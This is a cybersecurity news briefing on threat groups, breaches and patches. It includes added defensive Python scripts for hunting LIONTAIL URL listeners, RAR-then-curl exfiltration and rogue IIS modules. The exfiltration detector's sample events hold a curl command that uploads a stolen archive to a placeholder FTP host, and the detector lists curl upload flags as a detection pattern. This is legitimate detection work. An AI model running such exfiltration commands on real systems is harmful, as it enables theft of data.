By the CyberWire staff
At a glance.
- Fortinet confirms breach of customer data.
- Iran's Scarred Manticore deploys new malware across the Middle East.
- Earth Preta targets government entities in the Asia-Pacific.
- DragonRank manipulates SEO to promote scam sites.
- NoName partners with RansomHub.
- New RaaS operation is recruiting criminal affiliates.
- Patch news.
Fortinet confirms breach of customer data.
Cybersecurity firm Fortinet has confirmed that it sustained a data breach affecting some customer data, BleepingComputer reports. The company stated, "An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number (less than 0.3%) of Fortinet customers." The company hasn't disclosed what type of data was stolen, but says it has "communicated directly with customers as appropriate."
BleepingComputer notes that a threat actor posted on a hacking forum yesterday claiming to have stolen 440 GB of data from Fortinet's Azure SharePoint instance. The threat actor also posted credentials to an S3 bucket said to contain the stolen data, stating that Fortinet refused to pay a ransom to prevent the data from being leaked. BleepingComputer hasn't confirmed the validity of the threat actor's claims.
Iran's Scarred Manticore deploys new malware across the Middle East.
Check Point has published a report on a cyberespionage campaign by Scarred Manticore, a threat actor affiliated with Iran's Ministry of Intelligence and Security (MOIS). The threat actor is using a new malware framework dubbed "LIONTAIL" to target the government, telecommunications, military, and financial sectors in Saudi Arabia, the UAE, Jordan, Kuwait, Oman, Iraq, and Israel.
Check Point states, "LIONTAIL is a malware framework that includes a set of custom shellcode loaders and memory resident shellcode payloads. One of its components is the LIONTAIL backdoor, written in C. It is a lightweight but rather sophisticated passive backdoor installed on Windows servers that enables attackers to execute commands remotely through HTTP requests. The backdoor sets up listeners for the list of URLs provided in its configuration and executes payloads from requests sent by attackers to those URLs."
While the goal of this campaign is espionage, the researchers note that some of the same tools were used in an MOIS-sponsored destructive cyberattack against the Albanian government in 2022.
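A passive backdoor that registers URL listeners on a Windows server, as Check Point describes for LIONTAIL, shows up in the kernel HTTP service's live registration table rather than as a new listening socket. One hunting aid is to dump that table with the real built-in command `netsh http show servicestate view=requestq` and compare every registered URL against a known-good baseline. The script below is an added example for this page, not code from Check Point or any malware sample; the `netsh` excerpt it parses is constructed for the example (the WinRM prefixes are the stock ones, the `/owa/assets/status/` path is a hypothetical implant registration), and the allowlist is an assumption to be replaced with a per-host baseline.

```python
"""Flag unexpected HTTP.sys URL registrations from `netsh http show servicestate` output."""
import re

# Constructed excerpt modelled on `netsh http show servicestate view=requestq`.
# Sample text for this example, not a capture from a real host. The second
# request queue (pid 5812, /owa/assets/status/) is a hypothetical implant.
SAMPLE_NETSH = """\
Snapshot of HTTP service state (Request Queue View):
-----------------------------------------------------

Request queue name: Request queue is unnamed.
    Version: 2.0
    State: Active
    Number of active processes attached: 1
    Process IDs:
        4
    URL groups:
    URL group ID: F800000040000001
        State: Active
        Request queue name: Request queue is unnamed.
        Number of registered URLs: 2
        Registered URLs:
            HTTP://+:5985/WSMAN/
            HTTP://+:47001/WSMAN/

Request queue name: Request queue is unnamed.
    Version: 2.0
    State: Active
    Number of active processes attached: 1
    Process IDs:
        5812
    URL groups:
    URL group ID: F900000040000002
        State: Active
        Request queue name: Request queue is unnamed.
        Number of registered URLs: 1
        Registered URLs:
            HTTP://+:80/owa/assets/status/
"""

# Assumed allowlist: prefixes that legitimately register on this host.
# Build it from a known-good baseline of the same server role.
ALLOWED_PREFIXES = (
    "http://+:5985/wsman/",
    "http://+:47001/wsman/",
    "https://+:5986/wsman/",
)


def parse_registrations(text):
    """Return (pid, url) pairs; pid is None if a queue lists no process."""
    pairs, pids, mode = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if raw.startswith("Request queue name:"):   # unindented: a new request queue
            pids, mode = [], None
        elif line == "Process IDs:":
            mode = "pids"
        elif line == "Registered URLs:":
            mode = "urls"
        elif mode == "pids" and line.isdigit():
            pids.append(int(line))
        elif mode == "urls" and re.match(r"https?://", line, re.I):
            pairs.extend((pid, line) for pid in (pids or [None]))
        elif line.endswith(":"):                    # any other section header ends the mode
            mode = None
    return pairs


def unexpected_registrations(text, allowed=ALLOWED_PREFIXES):
    """Registrations not covered by an allowed prefix (case-insensitive match)."""
    hits = []
    for pid, url in parse_registrations(text):
        if not any(url.lower().startswith(a) for a in allowed):
            hits.append((pid, url))
    return hits


if __name__ == "__main__":
    for pid, url in unexpected_registrations(SAMPLE_NETSH):
        print(f"pid={pid} unexpected HTTP.sys registration: {url}")
```

Two caveats for real use: the PID must still be resolved to its image and parent (a backdoor that registers its URL from inside a legitimate process such as w3wp.exe will share that process's PID, which is why the check is per URL rather than per process), and on IIS or Exchange hosts the baseline will contain many prefixes, so the allowlist has to come from a clean reference system of the same role rather than from the host under investigation.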
Cobalt: The Only “Outperformer” in GigaOm’s Pentesting Report
For the second year in a row, Cobalt has been named the only “outperformer” in GigaOm’s independent report on Pentesting as a Service. Recognized for its streamlined approach, free retesting, and swift test launches, Cobalt leads the pack. Download the full report to see why Cobalt stands out as the category leader.
Earth Preta targets government entities in the Asia-Pacific.
Trend Micro is tracking new variants of malware used by the China-aligned threat actor Earth Preta (also known as "Mustang Panda"). The threat actor is using spearphishing emails and removable drives to deploy malware against government entities in the Asia-Pacific region. Trend Micro states, "Earth Preta employed a variant of the worm HIUPAN to propagate PUBLOAD into their targets' networks via removable drives. PUBLOAD was used as the main control tool for most of the campaign and to perform various tasks, including the execution of tools such as RAR for collection and curl for data exfiltration. PUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option."
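Trend Micro's description of PUBLOAD driving RAR for collection and curl for exfiltration is a sequence worth alerting on: an archive being created, then the same archive being uploaded by curl from the same parent a few minutes later. The detector below is an added example for this page, not Trend Micro's code or a published rule; it runs over constructed process-creation events in a Sysmon-like shape (timestamp, pid, ppid, image, command line) that are sample data, not telemetry from any real incident. It matches RAR on its command syntax (`<binary> a ... <file>.rar`) as well as on the image name, so a renamed copy is still caught; that renaming is an assumption about common tradecraft, not something the page states.

```python
"""Hunt for archive-then-upload sequences: RAR collection followed by a curl upload."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (Sysmon Event ID 1 shape). Sample data for
# this example only. 203.0.113.10 is a documentation address, r.exe a hypothetical
# renamed RAR binary, and the last two events are benign noise to be ignored.
SAMPLE_EVENTS = r"""
{"ts":"2024-09-10T08:12:03Z","pid":4120,"ppid":3988,"image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c dir"}
{"ts":"2024-09-10T08:14:41Z","pid":4312,"ppid":3988,"image":"C:\\ProgramData\\r.exe","cmdline":"r.exe a -r -hpSecret1 -m5 C:\\ProgramData\\1.rar C:\\Users\\a.smith\\Documents"}
{"ts":"2024-09-10T08:21:09Z","pid":4399,"ppid":3988,"image":"C:\\Windows\\System32\\curl.exe","cmdline":"curl.exe -T C:\\ProgramData\\1.rar ftp://203.0.113.10/up/ -u x:y"}
{"ts":"2024-09-10T09:02:00Z","pid":5001,"ppid":812,"image":"C:\\Windows\\System32\\curl.exe","cmdline":"curl.exe -sL https://example.com/health"}
{"ts":"2024-09-10T09:30:00Z","pid":5100,"ppid":812,"image":"C:\\Program Files\\WinRAR\\Rar.exe","cmdline":"Rar.exe a backup.rar C:\\Backups"}
"""

# curl options that send local data to a remote host.
UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "-d", "--data", "--data-binary"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_rar_collection(ev):
    """RAR 'a' (add to archive) command, by image name or by command syntax."""
    toks = ev["cmdline"].split()
    by_name = basename(ev["image"]) in {"rar.exe", "winrar.exe"}
    by_syntax = (len(toks) > 2 and toks[1].lower() == "a"
                 and any(t.lower().endswith(".rar") for t in toks[2:]))
    return by_name or by_syntax


def is_curl_upload(ev):
    toks = ev["cmdline"].split()
    return basename(ev["image"]) == "curl.exe" and any(t in UPLOAD_FLAGS for t in toks)


def archive_path(ev):
    """First .rar argument of a RAR command line, lower-cased, or None."""
    return next((t.lower() for t in ev["cmdline"].split()[2:] if t.lower().endswith(".rar")), None)


def find_collect_then_exfil(lines, window_minutes=30):
    """Return one hit per (RAR collection, later curl upload) pair sharing a parent PID."""
    window = timedelta(minutes=window_minutes)
    events = [json.loads(l) for l in lines.splitlines() if l.strip()]
    for e in events:
        e["t"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
    by_parent = defaultdict(list)
    for e in events:
        by_parent[e["ppid"]].append(e)

    hits = []
    for ppid, evs in by_parent.items():
        evs.sort(key=lambda e: e["t"])
        for i, a in enumerate(evs):
            if not is_rar_collection(a):
                continue
            arch = archive_path(a)
            for b in evs[i + 1:]:
                if b["t"] - a["t"] > window:
                    break
                if is_curl_upload(b):
                    hits.append({
                        "ppid": ppid,
                        "archive_pid": a["pid"],
                        "curl_pid": b["pid"],
                        # strongest signal: the uploaded file is the archive just created
                        "same_file": arch is not None and arch in b["cmdline"].lower(),
                    })
    return hits


if __name__ == "__main__":
    for h in find_collect_then_exfil(SAMPLE_EVENTS):
        print("collect-then-exfil:", h)
```

Correlating on the parent PID is what separates this from two noisy single-event rules (RAR use and curl use are both common on their own); the `same_file` flag is the part to weight highest, and a real deployment should also tie the parent back to the removable-drive execution that Trend Micro describes as the initial foothold.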
DragonRank manipulates SEO to promote scam sites.
Cisco Talos has published a report on "DragonRank," a Chinese-speaking hacking group focused on SEO manipulation. The researchers state, "The hacking group’s primary goal is to compromise Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is a malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users."
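Malware that sits inside IIS to rewrite what search engine crawlers see has to be loaded by IIS, and IIS malware of this class is typically installed as a native module declared in applicationHost.config (that this holds for BadIIS is an assumption here; the page does not describe its install mechanism). A quick triage step is therefore to inventory the `<globalModules>` entries of `%windir%\System32\inetsrv\config\applicationHost.config` and flag any whose DLL lives outside the stock `inetsrv` directory or whose name is not in a known-good baseline. The script below is an added example for this page, not Talos code or a detection signature; the config excerpt is constructed, with two real stock module names and one hypothetical implant entry.

```python
"""Inventory native IIS modules from applicationHost.config and flag suspicious ones."""
import xml.etree.ElementTree as ET

# Constructed applicationHost.config excerpt for this example. StaticFileModule and
# DefaultDocumentModule are genuine IIS modules; IISCacheModule is a hypothetical
# implant whose DLL sits outside the inetsrv directory.
SAMPLE_CONFIG = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="DefaultDocumentModule" image="%windir%\System32\inetsrv\defdoc.dll" />
      <add name="IISCacheModule" image="C:\Windows\Temp\iiscache.dll" />
    </globalModules>
  </system.webServer>
</configuration>
"""

# Stock IIS native modules all load from this directory.
INETSRV = "\\system32\\inetsrv\\"


def native_modules(config_xml):
    """Return (name, image) for every <add> under every <globalModules> element."""
    root = ET.fromstring(config_xml)
    mods = []
    for gm in root.iter("globalModules"):      # iter() avoids path parsing of dotted tags
        for add in gm.findall("add"):
            mods.append((add.get("name"), add.get("image") or ""))
    return mods


def suspicious_modules(config_xml, known_names=None):
    """Modules loaded from outside inetsrv, or not in an optional known-good name set."""
    hits = []
    for name, image in native_modules(config_xml):
        outside_inetsrv = INETSRV not in image.lower()
        unknown_name = known_names is not None and name not in known_names
        if outside_inetsrv or unknown_name:
            hits.append((name, image))
    return hits


if __name__ == "__main__":
    for name, image in suspicious_modules(SAMPLE_CONFIG):
        print(f"suspicious native module {name}: {image}")
```

The path check alone is weak against an implant dropped into `inetsrv` under a plausible name, which is why `known_names` exists: pair it with a hash baseline of the DLLs from a clean server of the same role, and also review per-site `<modules>` entries in web.config, which this example does not cover.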
NoName partners with RansomHub.
The NoName ransomware gang appears to be working as an affiliate for the RansomHub ransomware-as-a-service operation, BleepingComputer reports. ESET, which tracks NoName as "CosmicBeetle," says the group is also using its own strain of ransomware dubbed "ScRansom." ESET notes, "ScRansom is not very sophisticated ransomware, yet CosmicBeetle has been able to compromise interesting targets and cause great harm to them." The researchers add that since the ScRansom malware is buggy, victims who decide to pay the ransom should be prepared to deal with complications and potential loss of data during the decryption process.
New RaaS operation is recruiting criminal affiliates.
Palo Alto Networks' Unit 42 has published a report on Repellent Scorpius, a ransomware-as-a-service operation that surfaced in May 2024. The group distributes the Cicada3301 ransomware and conducts double-extortion attacks by exfiltrating data before deploying the ransomware. The researchers state, "Unit 42 has evidence to suggest that the Repellent Scorpius operators have developed a RaaS affiliate program. It operates a control panel for affiliates and ransom payment pages for victims, and actively recruits initial access brokers (IAB) and network intruders on Russian-language cybercrime forums."
Elevate Your Enterprise Identity Solutions
Seamlessly connect legacy apps to any identity provider with Strata. Effortlessly apply MFA and maintain identity continuity without disruptions. Enhance security and reduce tech debt with Strata’s efficient identity orchestration platform. Share your identity challenge and receive free AirPods Pro.
Patch news.
Progress Software has issued an emergency patch for a maximum severity remote code execution vulnerability (CVE-2024-7591) affecting all LoadMaster releases and LoadMaster Multi-Tenant hypervisor products, BleepingComputer reports. Progress stated, "It is possible for unauthenticated, remote attackers who have access to the management interface of LoadMaster to issue a carefully crafted http request that will allow arbitrary system commands to be executed. This vulnerability has been closed by sanitizing request user input to mitigate arbitrary system commands execution."
Veeam has patched a critical unauthenticated remote code execution flaw affecting its Backup & Replication software, HackRead reports. The flaw has been assigned a CVSS score of 9.8. Researchers at Censys said in a report on the vulnerability, "CVE-2024-40711 could allow an attacker to gain full control of a system, manipulate data, and potentially move laterally within a network, making it a relatively high-value target for threat actors. This vulnerability is particularly concerning because it’s likely to be exploited by ransomware operators to compromise backup systems and potentially create double-extortion scenarios."
Microsoft on Patch Tuesday issued fixes for 79 vulnerabilities, including four actively exploited zero-days, Dark Reading reports. Two of the zero-days (CVE-2024-38226 and CVE-2024-38217) are security bypass vulnerabilities that can be exploited via social engineering. Dark Reading quotes Satnam Narang, senior staff research engineer at Tenable, as saying, "Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running." A third zero-day (CVE-2024-38014) is an elevation of privilege flaw affecting Windows Installer that can allow an attacker to gain SYSTEM privileges. The fourth zero-day is a remote code execution vulnerability in the Servicing Stack that's been assigned a CVSS score of 9.8. This vulnerability can allow an attacker to roll back fixes for previously patched flaws in Windows 10, version 1507.
Ivanti has patched a maximum severity remote code execution vulnerability (CVE-2024-29847) affecting its Endpoint Management software, BleepingComputer reports. The company stated, "Deserialization of untrusted data in the agent portal of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution."
Adobe has released security patches for multiple products, including Acrobat and Reader, Photoshop, ColdFusion, Illustrator, and After Effects, BeyondMachines reports.
SecurityWeek has a summary of patches issued by ICS vendors, including Siemens, Schneider Electric, and ABB. The US Cybersecurity and Infrastructure Security Agency (CISA) has also issued four ICS advisories.
XPOSURE, The Virtual CTEM Summit Hosted by Pentera - now available On-demand!
Feeling a little too "xposed"? Gartner predicts implementing CTEM can make your organization 3x less likely to experience a breach. XPOSURE is your ticket to mastering the CTEM framework and ensuring you’re never caught with your defenses down. In just 3 hours, you'll learn how to continuously test your resilience, identify high-risk gaps, and apply best practices across your entire attack surface. Tune in on-demand!
Crime and punishment.
The US Department of the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned Cambodian businessman and senator Ly Yong Phat for his alleged involvement in "serious human rights abuse related to the treatment of trafficked workers subjected to forced labor in online scam centers." OFAC alleges that Ly owns a resort that's used as a scam center, with human trafficking victims forced to carry out online scam operations. Treasury states, "For more than two years, from 2022 to 2024, O-Smach Resort has been investigated by police and publicly reported on for extensive and systemic serious human rights abuse. Victims reported being lured to O-Smach Resort with false employment opportunities, having their phones and passports confiscated upon arrival, and being forced to work scam operations. People who called for help reported being beaten, abused with electric shocks, made to pay a hefty ransom, or threatened with being sold to other online scam gangs."
The UK's National Crime Agency has arrested a British teenager in connection with a cyberattack that hit Transport for London (TfL) last week, the Record reports. TfL, the government body responsible for London's transport network, says it's still dealing with limited disruptions and some customer data has been breached. The NCA disclosed that a 17-year-old male was detained on Computer Misuse Act offenses and has since been released on bail. The Register reports that the breach may have affected financial information belonging to around 5,000 customers. TfL is also bringing in all 30,000 employees to do in-person password resets.
A New York City man, Vitalii Antonenko, has pleaded guilty to conspiracies to engage in computer hacking, trafficking in stolen payment card numbers, and money laundering, the US Justice Department says. Antonenko was arrested at JFK Airport in March 2019 after arriving on a flight from Ukraine "carrying computers and other digital media that held hundreds of thousands of stolen payment card numbers." The Justice Department says "Antonenko and co-conspirators scoured the internet for computer networks with security vulnerabilities that were likely to contain credit and debit card account numbers, expiration dates, and card verification values (Payment Card Data), and other personally identifiable information (PII)."
HITRUST Collaborate 2024
Cybersecurity risk management leaders will cover critical topics, like challenges posed by AI, business resilience in the face of ransomware, the future cybersecurity workforce, and access to cybersecurity insurance. Thought leaders will offer actionable insights to help you fortify your security posture. Learn more!
Courts and torts.
Pennsylvania healthcare provider Lehigh Valley Health Network (LVHN) will pay $65 million to settle a class-action lawsuit filed over a ransomware-related data breach, SecurityWeek reports. Hackers affiliated with the BlackCat/ALPHV ransomware operation breached LVHN last year and stole personal, medical, and financial information belonging to patients. The stolen data included nude medical images of patients, some of which were posted to BlackCat's leak site. As part of the settlement, patients whose nude photos were leaked will receive up to $70,000.
Policies, procurements, and agency equities.
UK Technology Secretary Peter Kyle announced Thursday that the United Kingdom will designate data centers as critical national infrastructure, Industrial Cyber reports. Kyle said in a statement, "Putting data centres on an equal footing as water, energy and emergency services systems will mean the data centres sector can now expect greater government support in recovering from and anticipating critical incidents, giving the industry greater reassurance when setting up business in UK and helping generate economic growth for all." Additionally, the designation will "see the setting up of a dedicated CNI data infrastructure team of senior government officials who will monitor and anticipate potential threats, provide prioritised access to security agencies including the National Cyber Security Centre, and coordinate access to emergency services should an incident occur."